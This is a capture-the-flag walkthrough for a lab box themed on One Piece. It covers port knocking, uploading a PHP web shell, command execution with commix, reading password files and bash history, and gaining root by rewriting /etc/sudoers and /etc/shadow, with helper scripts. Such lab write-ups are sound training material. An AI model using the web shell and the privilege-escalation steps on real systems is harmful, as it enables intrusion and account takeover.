One Piece CTF
https://drive.google.com/file/d/1EUZnLexBzcDPUeRhfV3POU_H-FV-Eksd/view?usp=sharing
2 <= x <= 8 hours
Note: This is just a rough estimate. Some people may do it faster, some slower.
- Apache2 Options +Indexes
- Anonymous FTP
- Anonymous Samba
- Port Knocking
- PHP disable_functions was not configured
- Bad Permission configured (e.g. CHMOD 777)
- Plain text password used in command line
- Linux (Ubuntu 14.04+)
- Windows XP
- NMAP
- Netcat
- Web Browser (with JavaScript enabled)
- Python
- Git
- SSH
- Postman
- Web Shell
- DirBuster
- BurpSuite
- Escalation Scripts / Toolkits
- nmap
- nc --verbose 10414
- http:27777
- directories and files scanning
- Manually DNS configuration (Host file)
- grandline.htb:27777
- members.grandline.htb:27777
- Anonymous FTP
- Hidden Files
- Zipped file with password
- Anonymous Network File Sharing (SMB)
- QR code
- http:80
- The Firewall
- Connection Refused, Rejected with flag
- Port Knocking
- jQuery Files Uploader*
- Reverse Shell Injection
- PHP executable shell
- commix (for executing reverse shell)
- Environment Scanning
- Scan users
- Scan user's files and permission
- Get user's password (franky)
- Privilege Escalation
- Modifying /etc/sudoers using the available sudo command (/bin/cp)
- Modifying /etc/shadow by patching the password hash, then sudo
- Capture The Flag
- Locate the flag
- By determining process
- By locate or find command
- Locate the flag
The victim machine's HTTP port was protected by a firewall rule
-A INPUT -p tcp -m tcp --dport 80 -j REJECT --reject-with icmp-port-unreachable
but knockd was configured to delete that rule once the right sequence is knocked (/etc/knockd.conf):
[options]
logfile = /var/log/knockd.log
[openSSH]
sequence = 193,550,478
seq_timeout = 20
command = /sbin/iptables -D INPUT -p tcp --dport 80 -j REJECT
tcpflags = syn
Sequence | Port Number | Where to Find | How to obtain |
---|---|---|---|
Key 1 | 193 | members.grandline.htb/bookie1223sa.txt | 48 columns per line |
Key 2 | 550 | ftp://anonymous@ip/enieslobby/.onepiece.zip/3.jpg | Unzip by using password alabasta from nc -v VICTIM_IP 10414 |
Key 3 | 478 | smb://sambashared/2/qr code na ja | Scan the QR code |
Sudoer #1 = franky; Password = 3d2yhijinbe; Executable Command = /bin/cp
Sudoer #2 = tester; Executable Command = /bin/bash
Flag path = /root/flag.txt
Run nmap
nmap -sS -T4 -A -p- VICTIM_IP
Something is exposed on port 10414; connecting to it (nc -v VICTIM_IP 10414) returns the banner
KEY:alabasta
And the available services are
Port | Service | Status |
---|---|---|
21 | FTP | Open |
22 | SSH | Open |
80 | HTTP | Filtered |
445 | SMB | Open |
2049 | NFS | Open |
10414 | unknown (banner KEY:alabasta) | Open |
27777 | HTTP | Open |
Proceed with the following steps:
- Request index.php to see what's inside.
- directories and files scanning
- Manually DNS configuration (Host file)
- grandline.htb:27777
- members.grandline.htb:27777
Good Luck, Your brain will be fucked soon!
You will find a simple HTML document, and there seems to be nothing in it.
OK, don't give up. Let's run a dictionary attack; see Files and Directories Scanning
in the next section.
A Python script was used. It reads every line of wordlist.txt (one word per line), tries the word bare and with each file extension, and requests the result with the requests
module. Successful requests (HTTP 200) are printed.
#!/usr/bin/python3
# Dictionary scan for files and directories: each word from wordlist.txt is
# requested bare (directory) and with each extension; hits (HTTP 200) are printed.
import requests

target = "http://TARGET_IP:PORT"  # REPLACE TARGET_IP and PORT with your target (e.g. http://192.168.122.100:27777)

with open("wordlist.txt", "r") as words:
    for word in words:
        word = word.strip()
        if not word:
            continue
        for extension in ["", "php", "html"]:
            path = "/" + word + ("." + extension if extension else "")
            r = requests.get(target + path)
            if r.status_code == 200:
                print(path)
/
/index.php
/ziggy.php
Document needed.
Luckily, this Apache2 server was configured with Options +Indexes, so a directory without an index file lists its contents. A file named
decode.txt
showed up.
It contained Brainfuck code. Run it with an interpreter (an online one will do):
# BrainFuck code
+++++ +++++ [->++ +++++ +++<] >+++. <+++[ ->+++ <]>++ .<+++ +[->- ---<]
>-.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .++++ ++++. ---.+ ++++. -----
----. <++++ +++[- >---- ---<] >---- --.<+ +++++ +[->+ +++++ +<]>+ +++++
+++.< +++[- >+++< ]>+++ .<+++ +[->- ---<] >--.<
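The program above can be run offline. The interpreter below is an added example, not code from the writeup: a minimal Brainfuck interpreter (30000 eight-bit wrapping cells, no input, every non-command character ignored) with the page's decode.txt embedded as its input, so the hostname is recovered without pasting the code into a website.

```python
# Minimal Brainfuck interpreter, added so decode.txt can be decoded without an online compiler.
# Semantics assumed: 30000 eight-bit cells that wrap around, no input ("," is a no-op).

DECODE_TXT = """
+++++ +++++ [->++ +++++ +++<] >+++. <+++[ ->+++ <]>++ .<+++ +[->- ---<]
>-.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .++++ ++++. ---.+ ++++. -----
----. <++++ +++[- >---- ---<] >---- --.<+ +++++ +[->+ +++++ +<]>+ +++++
+++.< +++[- >+++< ]>+++ .<+++ +[->- ---<] >--.<
"""


def match_brackets(code):
    """Map every '[' index to its matching ']' and back; raise on an unbalanced program."""
    pairs, stack = {}, []
    for i, c in enumerate(code):
        if c == '[':
            stack.append(i)
        elif c == ']':
            if not stack:
                raise ValueError("unmatched ']' at instruction %d" % i)
            j = stack.pop()
            pairs[i], pairs[j] = j, i
    if stack:
        raise ValueError("unmatched '[' at instruction %d" % stack[-1])
    return pairs


def run_brainfuck(source, max_steps=1_000_000):
    """Execute a Brainfuck program and return everything it printed as a str."""
    code = [c for c in source if c in "+-<>[].,"]   # spaces/newlines are comments
    jump = match_brackets(code)
    tape = [0] * 30000
    ptr = pc = steps = 0
    out = []
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit reached; the program probably never halts")
        c = code[pc]
        if c == '+':
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == '-':
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == '>':
            ptr += 1
        elif c == '<':
            ptr -= 1
        elif c == '.':
            out.append(chr(tape[ptr]))
        elif c == '[' and tape[ptr] == 0:
            pc = jump[pc]          # skip the loop body
        elif c == ']' and tape[ptr] != 0:
            pc = jump[pc]          # back to the loop start
        if not 0 <= ptr < len(tape):
            raise IndexError("tape pointer ran off the tape")
        pc += 1
    return "".join(out)


if __name__ == "__main__":
    print(run_brainfuck(DECODE_TXT))   # the hostname hidden in decode.txt
```

Run it with `python3 bf.py`; the first-cell loop multiplies 10 by 10 to reach the ASCII range, and every later loop only adds or subtracts a small multiple to move to the next letter, which is why the program is so regular.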
The output is grandline.htb.
Could it be a DNS name? The record was added to the hosts file (on Linux, /etc/hosts):
TARGET_IP grandline.htb
Replace TARGET_IP with the target's IP address (e.g. 192.168.122.100).
The response body changed: there is an additional image, and a JavaScript file from a host name that does not resolve yet is loaded with it.
<img src="fox1.jpg">
<script src="http://members.grandline.htb/js/script.js"></script>
Update the hosts file again, this time for members.grandline.htb.
Found a simple web application with a form. Just fill in the form!
The only thing that can be done here is guessing, so guess every character in One Piece.
Make a word list from https://onepiece.fandom.com/wiki/List_of_Canon_Characters: in the browser's developer tools add id="characters" to the character <table>, then run the following in the console ($ is jQuery, which the wiki page already loads) and save the output as onepieceCharacterList.txt:
let names = $("#characters").children("tbody").children("tr").children("td:nth-child(2)")
let makeWordList = (myList) => {
    let word = ""
    for (let i = 0; i < myList.length; i++)
        word += (myList[i].innerText.trim() + "\n")
    return word
}
let wordList = makeWordList(names)
console.log(wordList)
A.O
Abdullah
Absalom
Acilia
Adele
Aggie 68
.
.
.
Foxy
.
.
.
If a guess is correct, the response body will be different.
#!/usr/bin/python3
# Guess the character: POST every name from the list and print those whose
# response body differs in size from the plain form page.
import requests

target = "http://members.grandline.htb:27777"  # needs the members.grandline.htb entry in /etc/hosts

# Baseline body size: the form page fetched with a plain GET.
previousResponseBodySize = len(requests.get(target).text)

with open("onepieceCharacterList.txt", "r") as words:
    for word in words:
        word = word.strip()
        if not word:
            continue
        r = requests.post(target, data={'char': word, 'submit': 'submit'})
        if r.status_code == 200 and len(r.text) != previousResponseBodySize:
            print(word)
Document needed.
Additional HTML appeared in the response body for the correct guess:
Correct
<meta http-equiv="refresh" content="30;url=/bookie1223sa.txt">
We found something. Is there a key here?
Hint: [ 24 x 48 ]
The file is 24 lines of 48 characters each, i.e. a greyscale image drawn with characters. Viewed at 48 columns per line it reads:
KEY
IS
193
- Access FTP as the anonymous user
- List all files and directories, including hidden items
- Found enieslobby/.onepiece.zip; extract it with the password alabasta (the password exposed on port 10414)
- View the image's Exif metadata (e.g. with exiftool)
- Found a key
SECRET{KEY2} = 550
- Mount the SMB share (Windows XP was used for this step)
- Go to the sambashared/2 folder
- You will find a QR code (filename "qr code na ja"); scan it
KEY3 = 478
After several nmap attempts we found that port 80 had been opened by accident. Why? Port knocking is the explanation: the sequence was configured as 193, 550, 478, and after nmap had run several times the sequence had been completed.
First nmap: 193 and 550 were knocked in order
Second nmap: 478 was knocked, completing the sequence
Netcat method (a connect attempt is enough, the ports need not be open; all three must arrive within seq_timeout, 20 seconds)
$ nc -v TARGET_IP 193
$ nc -v TARGET_IP 550
$ nc -v TARGET_IP 478
Knock method (the knock client ships in the knockd package)
# apt install knockd -y
$ knock -v TARGET_IP 193 550 478
Then the firewall rule is removed and port 80 becomes accessible.
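As an added example (not part of the writeup, and not knockd's own code): a knock client that does what the three nc lines do, plus an offline model of one knockd door so the accidental opening by nmap can be replayed without a target. The model encodes three assumptions about knockd: its packet filter only delivers SYNs for the ports named in the sequence, a knock to the wrong one of those ports discards the attempt, and an attempt not finished within seq_timeout seconds is forgotten. The traffic fed to it is constructed.

```python
# Port-knock client plus an offline model of knockd's door logic (added example).
# Model assumptions (not knockd's source): only SYNs to ports in the sequence are seen,
# a wrong sequence port discards the attempt, and attempts expire after seq_timeout.
import socket

SEQUENCE = [193, 550, 478]     # from the knockd.conf shown above
SEQ_TIMEOUT = 20               # seconds, likewise


def knock(host, sequence=SEQUENCE, timeout=0.3):
    """Send one TCP SYN per port, in order. A connect attempt is enough: knockd
    only watches for the SYN (tcpflags = syn), so refused or dropped is fine."""
    for port in sequence:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect_ex((host, port))
        except OSError:
            pass
        finally:
            s.close()


class Door:
    """State of one knockd [door] section, tracked per source IP."""

    def __init__(self, sequence=SEQUENCE, seq_timeout=SEQ_TIMEOUT):
        self.sequence = list(sequence)
        self.seq_timeout = seq_timeout
        self.attempts = {}   # src_ip -> (next stage index, time of first knock)

    def observe(self, t, src_ip, dport):
        """Feed one SYN seen at time t (seconds). Returns True when this packet
        completes the sequence, i.e. when knockd would run the door's command."""
        if dport not in self.sequence:
            return False                       # never reaches knockd's filter
        stage, started = self.attempts.get(src_ip, (0, t))
        if stage and t - started > self.seq_timeout:
            stage, started = 0, t              # stale attempt expired
        if dport == self.sequence[stage]:
            stage += 1
            if stage == len(self.sequence):
                self.attempts.pop(src_ip, None)
                return True
            self.attempts[src_ip] = (stage, started)
        else:
            self.attempts.pop(src_ip, None)    # out of order: attempt discarded
        return False


def door_opens(events, **door_args):
    """Replay (t, src_ip, dport) SYNs and return the times at which the door opened."""
    door = Door(**door_args)
    return [t for t, ip, port in events if door.observe(t, ip, port)]


# Constructed traffic samples.
GOOD = [(0.0, "10.0.0.5", 193), (0.1, "10.0.0.5", 550), (0.2, "10.0.0.5", 478)]
WRONG_ORDER = [(0.0, "10.0.0.5", 193), (0.1, "10.0.0.5", 478), (0.2, "10.0.0.5", 550)]
TOO_SLOW = [(0.0, "10.0.0.5", 193), (1.0, "10.0.0.5", 550), (25.0, "10.0.0.5", 478)]
# A port scan: unrelated ports are invisible to knockd, so 193/550/478 arriving in
# that order among them is a valid knock, which is how the nmap runs opened port 80.
SCAN = [(i, "10.0.0.9", p) for i, p in enumerate([22, 193, 80, 8080, 550, 21, 478, 445])]

if __name__ == "__main__":
    for name, events in [("good", GOOD), ("wrong order", WRONG_ORDER),
                         ("too slow", TOO_SLOW), ("port scan", SCAN)]:
        print(name, "->", door_opens(events))
    # knock("TARGET_IP")   # real use: then port 80 should answer
```

The scan case is the interesting one: with tcpflags = syn and no port outside the sequence counted against you, any full-range scan that happens to emit the three SYNs in sequence order inside the timeout window opens the door, so a knock sequence is no substitute for authentication on the service behind it.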
In this step we can upload a backdoor script.
Found an open-source web application:
jQuery-File-Uploader
- The default PHP configuration leaves disable_functions empty, so an uploaded PHP script can call system commands (exec, system, shell_exec, ...).
- The allowed file types (accept_file_types in UploadHandler.php) are not restricted, so a .php file is accepted.
The link below is a powerful web shell. You can upload this file directly via jQuery File Uploader. https://github.com/flozz/p0wny-shell/blob/master/shell.php
Or, the manual method: one line of PHP together with commix
can open a reverse shell for you.
shell.php
<?php echo exec($_GET['cmd']); ?>
(exec() returns only the last line of the command's output; system() prints all of it.)
According to the project's documentation, the default upload_dir is ./server/php/files, so the uploaded file is reachable under that path.
https://github.com/commixproject/commix
python3 commix.py --url="http://grandline.htb/jQuery-File-Uploader/server/php/files/shell.php?cmd=whoami"
Now we have shell access.
You can use automated enumeration tools: upload one of the scripts from the link below, run it and wait for the scan to finish. https://netsec.ws/?p=309&fbclid=IwAR0X9bFcC4VRO7CfMjsJRQEMzr19GcUXi_n3lUyfMy8Nv0Y3MdwyUEDOk9U
Or let's walk through it manually.
$ whoami
> www-data
[www-data]$ pwd
> /var/www/phpmail
[www-data]$ cat /etc/passwd
> root:!:
> ...
> tester:$6$...
> john:$6$...
> loki:$6$...
> franky:$6$
[www-data]$ ls -la /home/*
> /home/franky
> -rwxrwxrwx .bash_history
Nani??? Permissions were set to 777
[www-data]$ cat /home/franky/.bash_history
> ...
> echo 3d2yhijinbe > realpassword.txt
> ...
Nani??? Why put a password on the command line like this!
[me@localhost]$ ssh franky@...
Password: 3d2yhijinbe
[franky@ubuntu]$ sudo -l
> /bin/cp
[franky@ubuntu]$ sudo cp
cp: Missing Operands
[franky@ubuntu]$ pwd
> /home/franky
[franky@ubuntu]$ touch sudoers_Im_Coming
[franky@ubuntu]$ sudo cp /etc/sudoers ~/sudoers_Im_Coming
[franky@ubuntu]$ ls -l sudoers*
> -rwxr-xr-x franky franky sudoers_Im_Coming
The destination is created by franky first on purpose: sudo cp then overwrites the existing file in place, so it stays owned by franky and can be edited without root.
[franky@ubuntu]$ vi sudoers*
ViM screen
...
root ALL=(ALL:ALL) ALL
franky ... NOPASSWD: /bin/cp # Change /bin/cp to /bin/bash
...
:wq
Mind the syntax: this bypasses visudo's check, and a malformed /etc/sudoers makes sudo refuse to run at all. Then copy the edited file back with the same sudo cp right (writing into the existing /etc/sudoers keeps its root ownership and 0440 mode, which sudo insists on):
[franky@ubuntu]$ sudo cp -f ~/sudoers_Im_Coming /etc/sudoers
[franky@ubuntu]$ sudo -s
[root@ubuntu]#
[franky@ubuntu]$ cat /etc/group | grep sudo
> sudo:x:27:tester
[franky@ubuntu]$ touch my_shadow
[franky@ubuntu]$ sudo cp /etc/shadow my_shadow
[franky@ubuntu]$ vi my_shadow
ViM screen (replace the second field of the tester line, the hash, with franky's hash; tester's password then becomes 3d2yhijinbe and every other field stays as it is)
...
tester:$6$t72esmkL$0jGigluRhSPsvKXttv/KFr66QvrLQNq4A2EkXZFZmSIAhWeLMmQc57uG9K2O14sJoXNdT9MjcvwM53EoBKG0O1:17954:0:99999:7:::
franky:$6$5r7X8q0p$8/mDvW4mkkuXNwmGU78TlE1n3JXf1hHNZwKbZlDjdchRGE.7cRb/IwwclWQtKeWUIR0IMbKzIcY8OIOfOVFhE0:17949:0:99999:7:::
...
:wq
[franky@ubuntu]$ sudo cp -f my_shadow /etc/shadow
[franky@ubuntu]$ su tester
Password: 3d2yhijinbe
[tester@ubuntu]$ sudo -s
Password: 3d2yhijinbe
[root@ubuntu]#
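The /etc/shadow edit done by hand in vi above, as an added example (not code from the writeup): copy the hash of a user whose password we know (franky) onto a target user (tester) and leave every other field and line untouched, so the file can be written back with the same sudo cp right. The sample shadow content is constructed from the two lines shown in the listing plus a locked root entry; the file and user names are those of this box.

```python
# Patch a copy of /etc/shadow: give one user another user's password hash (added example).
# Usage on the box, after `touch my_shadow && sudo cp /etc/shadow my_shadow`:
#   python3 patch_shadow.py my_shadow franky tester && sudo cp -f my_shadow /etc/shadow

# Constructed sample: the tester and franky lines from the writeup plus a locked root entry.
SAMPLE_SHADOW = """root:!:17949:0:99999:7:::
tester:$6$t72esmkL$0jGigluRhSPsvKXttv/KFr66QvrLQNq4A2EkXZFZmSIAhWeLMmQc57uG9K2O14sJoXNdT9MjcvwM53EoBKG0O1:17954:0:99999:7:::
franky:$6$5r7X8q0p$8/mDvW4mkkuXNwmGU78TlE1n3JXf1hHNZwKbZlDjdchRGE.7cRb/IwwclWQtKeWUIR0IMbKzIcY8OIOfOVFhE0:17949:0:99999:7:::
"""


def parse_shadow(text):
    """Return {user: fields}; every shadow line has exactly 9 colon-separated fields."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError("malformed shadow line: %r" % line)
        entries[fields[0]] = fields
    return entries


def copy_hash(text, from_user, to_user):
    """Give to_user the password hash of from_user; return the new file content.
    Only the hash field of to_user's line changes; order and all other lines are kept."""
    known = parse_shadow(text)[from_user][1]
    if not known.startswith("$"):
        raise ValueError("%s has no usable hash (locked or empty: %r)" % (from_user, known))
    out = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 9 and fields[0] == to_user:
            fields[1] = known
            line = ":".join(fields)
        out.append(line)
    return "\n".join(out) + "\n"


def changed_users(before, after):
    """Users whose line differs between two versions: check this is only the
    intended user before copying the file back over /etc/shadow."""
    b = {l.split(":")[0]: l for l in before.splitlines() if l.strip()}
    a = {l.split(":")[0]: l for l in after.splitlines() if l.strip()}
    return sorted(u for u in set(b) | set(a) if b.get(u) != a.get(u))


if __name__ == "__main__":
    import sys
    path, src, dst = sys.argv[1:4]
    with open(path) as f:
        original = f.read()
    patched = copy_hash(original, src, dst)
    print("changed:", changed_users(original, patched))
    with open(path, "w") as f:
        f.write(patched)
```

After the copy back, `su tester` with franky's password works because the hash (salt included, the `$6$5r7X8q0p$` prefix) is what login compares against; since tester is in the sudo group, `sudo -s` with the same password gives root. The changed_users check matters because cp -f over /etc/shadow replaces the whole file: a stray edit to any other line locks that account out.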
[root@ubuntu]# cd /root
[root@ubuntu]# ls
> rwx------ root root flag.txt
> rwx------ root root smb.conf
[root@ubuntu]# vi flag.txt
Key=alabasta # Change it to whatever you like